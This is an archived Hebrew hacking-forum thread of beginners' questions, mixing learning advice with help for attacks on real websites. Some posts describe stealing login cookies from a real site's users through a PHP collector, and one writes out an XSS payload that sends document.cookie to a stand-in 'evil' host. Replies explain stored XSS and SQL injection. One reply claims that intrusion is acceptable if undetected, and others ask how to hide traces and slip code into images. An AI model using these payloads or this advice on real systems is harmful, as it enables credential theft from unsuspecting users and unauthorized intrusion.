ארכיון רד-בורד: כל השאלות הקטנות שיש לכם.

27/05/2007 11:32:58 Explo!7

ציטוט:ציטוט:ציטוט:זה לא עובד ככה, כאן אתה מנצל באג מסוג "XSS", או יותר נכון- CSS, שזה קיצור של Cross Site Scripting, אתה לא מריץ את הבאג על האתר, אלה על הקליינט של הגולש שגולש באתר, היינו- הדפדפן שלו.

הדפדפן הוא זה שמבצע את הפקודה לעבור לעמוד הבא, ולא האתר גורם לו לבצע את זה.

אם יש לך אפשרות לגרום למחרוזת הזאת להשאר בעמוד שממנו אתה רוצה שיעברו האנשים לוואלה זה יעבוד, אבל רק עם המערכת תריץ את הקוד ולא סתם תציג אותו כמחרוזת פשוטה.
איך אני עושה כזה דבר?
כמו שסיפי אמר, אתה צריך שזה ישאר בדף הראשי כדי שכל מי שיכנס זה יורץ על הדפדפן שלו.
אפשר לעשות את זה בצורה שתכניס את הקוד לDB (לאיזור שנשלף לדף הראשי-או הדף שממנו אתה רוצה להפנות את כל מי שנכנס).
זו הדרך הכי נפוצה.

תודה אני ינסה=]

27/05/2007 17:41:21 No_Nick

אני חדש בנושא ואני רוצה ללמוד להיות האקר מאיפה כדאי להתחיל???

27/05/2007 20:03:10 devil kide

ציטוט:אני חדש בנושא ואני רוצה ללמוד להיות האקר מאיפה כדאי להתחיל???
תעבור על הטופיק הזה מההתחלה עד הסוף.
השאלה נמצאת כאן לפחות 4-5 פעמים.

08/06/2007 15:39:48 T0-R3ST

תלמד שפות תיכנות.
PHP - מומלץ.

20/06/2007 10:44:29 HTK

טוב, יש לי כמה שאלות:
1.sql inj, רוב המדריכים הם על הגירסא של 99, או 2003, מה שרואים במדריכים האלה הוא קצת שונה ממה שצריך לעשות היום, זה אומר שאם יוצא עכשיו mssql חדש, אז גם יצטרכו למצוא שיטות אחרות?, או שאפילו זה יהיה יותר טוב כי יגיעו גם אפשרויות חדשות ויהיה אפשר לנצל אותן?.

2. הוצאתי מידע מsyscolumns, אבל רק הטורים שהצלחתי לנחש UID,name
אין לי מושג מה שאר הטורים - וחיפשתי הרבה..
עכשיו משהו משם יכול לעזור לי? יש שם בכלל טור של סיסמא?.

3. רציתי לדעת קצת בקשר לפריצה לשרתים, באיזה דרך ניתן לעשות את זה, אבל לא סריקות, אלא לדעת על מה הבאג מתבסס.
אפילו אקספלויט, אני רק רוצה להבין איך זה פועל, או אם למישהו יש טקסט כלשהו.

4. union select, למה בסתם דף עם כתבה זה לא פועל לי? אבל בדף למשל של "שינוי פרטים" כאשר יש פלט מהמשתמש אני כן מצליח לשלוף בעזרתו מידע?.

תודה רבה!

20/06/2007 13:35:07 Debug

3)ישנן שיטות רבות לכתיבת אקספלוייטים הרעיון המרכזי שלהן הוא ניצול כשלים תיכנותיים ביישום כלשהו שרץ על השרת/מחשב כאשר זה מתחלק לשתי קטגוריות:
פריצה לוקאלית - במטרה לשפר את רמת הגישה שלך במחשב/שרת
(root)
פריצה מרוחקת - כלומר ממחשב אחד למחשב אחר במטרה להשתלט על הקורבן ולהשיג שאלל (shell) כלומר יכול להרצת קוד זדוני על הקורבן

שיטות/התקפות שמשתמשים בהם על מנת לכתוב אקספלוייטים:
Stack Overflow
Heap Overflow
Format String Bug
ועוד...
הרשת גדושה בחומר על הנושאים האלו פשוט צריך לחפש
לגבי ספרים בנושא:
אני ממליץ בחום על -The Shellcoder’s Handbook ספר מעולה שעוסק לעומק בכל הנושא

[ההודעה נערכה על-ידי Debug ב-20/06/2007 13:38:24]

01/08/2007 12:02:16 e77ha7r

תשעמו אני רוצה להיות האקר/קראקר ומה שזה לא יהיה.
תשמעו אין יל ידע בכלום,חוץ מ-HTML,וקצת פסקל..
קניתי את הספר של דורון סיוון,ואני לא מבין כמעט כלום..
אתם יכולים בבקשה להביא לי עצות,איזה שפות תכנות ללמוד,מה אני צריך לדעת(ראיתי כל מיני מושגים במתמטיקה,אז תגידו לי בבקשה גם מה צריך לדעת)
ואחרי זה איך אני יפתח את הידע שלי בהאקינג?

תודה!

12/08/2007 11:06:15 iNDi@NBoY

מצאתי אתר ששם המשתמש והסיסמא של כל משתמש נשמרים בCookies. כתבתי בPHP אתר שמקבל שני פרמטרים Cookies ואתר בשביל Redirecting. זה עובד אם אני מביא לאדם קישור והוא לוחץ עליו בתוך האתר הבעיה היא שאי איפשר לפרסם קישור שלא מתחיל בhttp. אז בניתי חתימה בflash ואז גיליתי שאיך שהוא חסמו פלאשים למרות שהשתמשתי בטופס מזויף עם סקריפטים משלי זה לא עזר.
מה אפשר לעשות :-(

נ.ב.
יש לי אפשרת לכתוב סקריפטים אבל יש סינון מצוין.

18/08/2007 20:28:02 devil kide

ציטוט:מצאתי אתר ששם המשתמש והסיסמא של כל משתמש נשמרים בCookies. כתבתי בPHP אתר שמקבל שני פרמטרים Cookies ואתר בשביל Redirecting. זה עובד אם אני מביא לאדם קישור והוא לוחץ עליו בתוך האתר הבעיה היא שאי איפשר לפרסם קישור שלא מתחיל בhttp. אז בניתי חתימה בflash ואז גיליתי שאיך שהוא חסמו פלאשים למרות שהשתמשתי בטופס מזויף עם סקריפטים משלי זה לא עזר.
מה אפשר לעשות :-(

נ.ב.
יש לי אפשרת לכתוב סקריפטים אבל יש סינון מצוין.
תוכל להסביר את עצמך בצורה יותר טובה?

22/08/2007 17:44:39 AD!R

אממ יש לי שאלה, או בקשה, אני כבר לא יודע:

איך אפשר להשתיל קוד בתמונה ? (קוד של PHP, ASP וכו’, לא קודים של C, Pascal וכו’...)
נגיד פורמט SWF, GIF,JPG,BMP, לא כל כך משנה איזה פורמט, העיקר לדעת את העקרון של איך זה פועל...

22/08/2007 21:27:03 Dn_A

מוסיפים ע"י עורך הקסה בסוף הקובץ סטרינג[ההודעה נערכה על-ידי Dn_A ב-22/08/2007 21:27:47]

22/08/2007 22:42:09 AD!R

אממ,
אפשר הסבר קצת יותר מפורט ??

24/08/2007 05:06:03 devil kide

ציטוט:אממ,
אפשר הסבר קצת יותר מפורט ??
אתה מדבר על XSS, אולי?

24/08/2007 14:20:14 AD!R

לא, לא XSS, לא חשוב, היסתדרתי, מצאתי בפורום אחר, רק שזה לא עובד כל כך..

23/10/2007 14:45:35 holyhol

אני שמעתי מחבר שיודע לפרוץ FTP שמפה הוא
למד שלפרוץ והכל ושאתם פורום תותח.
אשמח לדעת מאיפה אני יכול ללמוד כי אני כבר המון זמן מנסה, ולמרות שאני מכיר עוד
כמה אנשים שיודעים לפרוץ אין להם כוח/זמן ללמד אותי, אשמח אם תתנו לי קישורים.

29/10/2007 16:18:14 AsSembly

יש פורום כזה גרסא
PHP 2.0.11
אם אני משתמש בשיטה של השינוי קוד בקוקיז יכולים לגלות אותי ?
או בכלל לגלות איכשהו ?

29/10/2007 18:16:40 devil kide

לא הבנתי.

29/10/2007 20:10:20 AsSembly

אותה מערכת שיכנסו אליה , האם היא תוכל לזהות שנכנסו אליה ?

31/10/2007 14:13:42 SkOd

ציטוט:אותה מערכת שיכנסו אליה , האם היא תוכל לזהות שנכנסו אליה ?

תלוי.
אם יש עוד אדמין שמחובר למערכת הוא יראה את ה IP שלך בלוח ניהול.
עוד אפשרות זה לבדוק מי נכנס לתיקייה /admin/ בלוגים של השרת (Apache, IIS, etc..)

כל עוד אתה לא עושה נזק ולא גורם לאף אחד לחשוד שהיתה פריצה אתה בסדר.

29/01/2008 08:44:14 BoLo

שאלה איך אני יכול לגלות Id של FTP..?

30/03/2008 00:33:58 Ese

שאלה או שתיים לי אליכם,
אם משתמשים ב- Web Anonymizer פשוט באינטרנט בשביל לגלוש לאתר כלשהו, האם בעל האתר למרות הכל יוכל לדעת את ה- IP האמיתי שלי?

והאם מישהו יכול להפנות אותי בבקשה לחומר לקריאה (גם אנגלית מתאים) בנושא של הסתרת העקבות שיכולות להוביל אלייך.

תודה

06/04/2008 16:00:03 iNDi@NBoY

ציטוט:
ציטוט:
מצאתי אתר ששם המשתמש והסיסמא של כל משתמש נשמרים בCookies. כתבתי בPHP אתר שמקבל שני פרמטרים Cookies ואתר בשביל Redirecting. זה עובד אם אני מביא לאדם קישור והוא לוחץ עליו בתוך האתר הבעיה היא שאי איפשר לפרסם קישור שלא מתחיל בhttp. אז בניתי חתימה בflash ואז גיליתי שאיך שהוא חסמו פלאשים למרות שהשתמשתי בטופס מזויף עם סקריפטים משלי זה לא עזר.
מה אפשר לעשות :-(

נ.ב.
יש לי אפשרת לכתוב סקריפטים אבל יש סינון מצוין.

תוכל להסביר את עצמך בצורה יותר טובה?

יש אתר שאני מכניס פלט או בכתיבה של HTML או בכתיבה רגילה.
אם אני כותב HTML הוא מסנן JS והופך את כל התגים לפורמט שלו.
יענו במקום <a href=jscriptlocation=’http://myevilsite.com/hack.php?pass=’+escape(document.cookie) />
הוא משנה את זה...

26/04/2008 22:26:55 Ap0pHIS

בבקשה הסבר על CRACK ME

27/04/2008 00:03:56 Debug

http://en.wikipedia.org/wiki/Crackme
נ.ב
ברוך הבא לפורום![ההודעה נערכה על-ידי Debug ב-27/04/2008 00:04:47]

30/04/2008 15:08:33 g@lileo

*הווו הבושה *[ההודעה נערכה על-ידי g@lileo ב-06/02/2010 00:14:45]

09/03/2009 00:25:31 ms1014

מצטער לא ראיתי שיש כאן נושא שאלות
הנה השאלה:
אני רוצה להיות אדם שיוכל לעזור לאנשים ולהגן על המחשב שלהם ואתרים שלהם יותר ובגלל זה אני לומד יותר ויותר אני כרגע יודע את השפות html javascript וגם java (וקצת OOP ) לאן כדי להתקדם??

16/03/2009 07:44:05 cp77fk4r

ללימודי רפואה!
סתם ;), אני הייתי ממליץ לך ללמוד גם איזו צד שרת כדוגמאת PHP מה שיקנה לך את הכלים שיאפשרו לך לשאר פחות או יותר איך בנוי עמוד האינטירנט שאתה עומד מולו ואיפה פחות או יותר אפשר למצוא את הפרצות.

12/11/2009 22:17:55 500SW

מה זה dns spoofing??

19/11/2009 19:43:43 l3D

ציטוט:מה זה dns spoofing??
מתקפה שבה משנים לקורבן את שרת ה-DNS שלו לשרת DNS משלך, וכך אתה יכול לשלוט בתשובות שהוא יקבל לגבי שאילתות שהוא ישלח (=אתה יכול לגרום לו להתחבר לשרת משלך אם הוא משתמש בשירות ה-DNS)

רד-בורד: ארכיון

ראשי > אבטחת מידע > כל השאלות הקטנות שיש לכם.